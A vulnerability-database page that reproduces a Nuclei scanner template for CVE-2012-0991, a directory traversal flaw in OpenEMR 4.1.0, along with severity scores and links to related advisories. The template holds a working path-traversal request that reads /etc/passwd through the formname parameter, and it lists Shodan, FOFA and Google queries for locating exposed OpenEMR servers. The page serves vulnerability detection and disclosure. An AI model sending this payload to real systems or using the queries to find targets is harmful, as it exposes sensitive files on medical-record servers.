Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nucleiProjectDiscoveryNUCLEI:CVE-2012-0991
HistoryJul 30, 2021 - 11:04 p.m.

OpenEMR 4.1 - Local File Inclusion

2021-07-3023:04:14
ProjectDiscovery
github.com
1

3.5 Low

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:M/Au:S/C:P/I:N/A:N

6.3 Medium

AI Score

Confidence

Low

0.727 High

EPSS

Percentile

98.1%

JSON

Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a … (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter.

id: CVE-2012-0991

info:
  name: OpenEMR 4.1 - Local File Inclusion
  author: daffainfo
  severity: low
  description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Apply the latest security patches or upgrade to a newer version of OpenEMR.
  reference:
    - https://www.exploit-db.com/exploits/36650
    - https://nvd.nist.gov/vuln/detail/CVE-2012-0991
    - http://www.open-emr.org/wiki/index.php/OpenEMR_Patches
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/72914
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:S/C:P/I:N/A:N
    cvss-score: 3.5
    cve-id: CVE-2012-0991
    cwe-id: CWE-22
    epss-score: 0.72743
    epss-percentile: 0.98084
    cpe: cpe:2.3:a:openemr:openemr:4.1.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: openemr
    product: openemr
    shodan-query:
      - http.html:"openemr"
      - http.title:"openemr"
      - http.favicon.hash:1971268439
    fofa-query:
      - icon_hash=1971268439
      - body="openemr"
      - title="openemr"
      - app="openemr"
    google-query: intitle:"openemr"
  tags: cve,cve2012,lfi,openemr,traversal,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c52d46badf6a9fb78ec08f5843c6acb660464e72ff79d7e8dc3268397c230d7e022005a1350eca603c0af65ba683420f8fab2f5d2173423b75a641d4e8a3d07db191:922c64590222798bb761d5b6d8e72950

Related

cvelist 1
cve 1
prion 1
nvd 1
htbridge 1
openvas 2
cvelist
cvelist
CVE-2012-0991
2012-02-07 21:00:00
cve
cve
CVE-2012-0991
2012-02-07 21:55:03
prion
prion
Directory traversal
2012-02-07 21:55:00
nvd
nvd
CVE-2012-0991
2012-02-07 21:55:03
htbridge
htbridge
Multiple vulnerabilities in OpenEMR
2012-01-11 00:00:00
openvas
openvas
OpenEMR Local File Include and Command Injection Vulnerabilities
2012-02-02 00:00:00
OpenEMR Local File Include and Command Injection Vulnerabilities
2012-02-02 00:00:00

3.5 Low

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:M/Au:S/C:P/I:N/A:N

6.3 Medium

AI Score

Confidence

Low

0.727 High

EPSS

Percentile

98.1%

JSON
Related for NUCLEI:CVE-2012-0991
cvelist1cve1prion1nvd1htbridge1openvas2